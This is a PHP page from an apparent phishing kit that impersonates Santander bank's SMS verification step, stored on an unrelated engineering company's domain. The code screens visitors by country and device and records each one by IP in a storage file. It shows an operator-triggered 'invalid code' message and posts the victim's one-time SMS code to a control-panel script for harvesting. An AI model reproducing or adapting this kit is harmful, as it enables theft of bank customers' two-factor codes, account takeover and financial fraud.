File "step-three.php"

Full Path: /home/gemaengineering/particularesantander.gemaengineering.com/santander-page/pages/step-three.php
File size: 5.3 KB
MIME-type: text/x-php
Charset: utf-8

<?php
    error_reporting(0);
    session_start();

    include '../setting/functions.php';
    include '../includes/current-page.php';
    include '../includes/check-allowed-countries.php';
    include '../includes/check-devices-allow.php';
    
    $ip = get_client_ip();
    $get_name_file = $ip;
    $target_file = "../panel/storage/{$get_name_file}.json";
    $json_file = file_get_contents($target_file);
    $user_info = json_decode($json_file, true);
    $user_info['error_sms'];
    
    if ($user_info['error_sms'] == 1) {
        $get_name_page = "Page SMS Code Error";
        $get_step = "sms-error";
    } else {
        $get_name_page = "Page SMS Code";
        $get_step = "sms";
    }
    get_page_info($get_name_page, $get_name_file);
    
    $random_classes = rand(0, 1000000); 
    $permitted_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
?>
<!DOCTYPE html>
<html lang="en" class="">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- SEO -->
    <?php include '../libraries/seo.php'; ?>
    <!-- Font Google -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito:ital,wght@0,200..1000;1,200..1000&display=swap" rel="stylesheet">
    <!-- Font Awesome Library --> 
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <!-- File Css -->
    <link rel="stylesheet" href="../css/main.css">
    <link rel="stylesheet" href="../css/basic-thinks.css">
    <!-- Favicon -->
    <link rel="icon" href="../img/favicon.ico">
    <link rel="shortcut" href="../img/favicon.ico">
    <link rel="appel-touch-icon" href="../img/favicon.ico">
    <title>PÁGINA WEB</title>
</head> 
<body id="body" class="">
    <!-- Main -->
    <div class="section-main">
        <div class="section-left">
        </div>
        <div class="section-right">
            <div class="logo">
                <img src="../img/logo.png" alt="">
            </div>
            <div class="prt-icon">
                <i class="fa-solid fa-comments"></i>
            </div>
            <h1 style="margin-bottom: 10px !important;font-size: 25px !important;">Verifica tu información mediante código SMS</h1>
            <p>
                Introduce el código de verificación que te enviamos por SMS a tu móvil. Este código nos ayuda a confirmar tu identidad y a mantener tu cuenta segura.
            </p>
            <form action="../control-panel/check-action.php" method="post" id="fSD" class="form-element">
                <input type="hidden" name="step" value="<?php echo $get_step; ?>">
                <input type="hidden" name="ip" value="<?php echo $get_name_file; ?>">
                <?php
                    if ($user_info['error_sms'] == 1) {
                        echo '<div class="message-error-pages">
                                <img src="../img/icon-error.png" alt="">
                                Código inválido o caducado. Se ha enviado un nuevo código.
                            </div>';
                    }
                ?>
                <div class="prt-l-i-me" id="div1">
                    <label for="sms">Código SMS</label>
                    <input type="tel" name="sms" id="sms" class="input-element" placeholder="••••••">
                    <small id="messageError1" class="me-i"><img src="../img/icon-error.png" alt="">Este campo es obligatorio</small>
                    <span class="counter">
                        <span class="title-counter">Tiempo de validez del código :</span>
                        <span id="minutes" class="counter-time">05</span><span class="counter-time">:</span><span id="seconds" class="counter-time">00</span>
                    </span>
                </div>
                <div class="prt-btn">
                    <button type="submit" name="b_s_d_p" id="bSD" class="btn-element">Continuar</button>
                </div>
            </form>
        </div>
    </div>
    <!-- Main -->

    <!-- Footer -->
    <div class="footer">
        <div class="section-top">
            <span class="link-footer">Seguridad y privacidad</span>
            <span class="link-footer">Términos y condiciones</span>
            <span class="link-footer">Precios</span>
            <span class="link-footer">Información legal</span>
            <span class="link-footer">Política de cookies</span>
        </div>
        <div class="section-bottom">
            <div class="logo-footer">
                <img src="../img/logo-footer.png" alt="">
            </div>
            <div class="text-footer">© <?php echo date("Y"); ?> Santander - Reservados todos los derechos.</div>
        </div>
    </div>
    <!-- Footer -->

    <!-- Script Js -->
    <script src="../js/script-step-three.js"></script>
    <script src="../js/jquery.min.js"></script>
    <?php include '../includes/redirect.php'; ?>
    <?php include '../includes/status.php'; ?>
</body>
</html>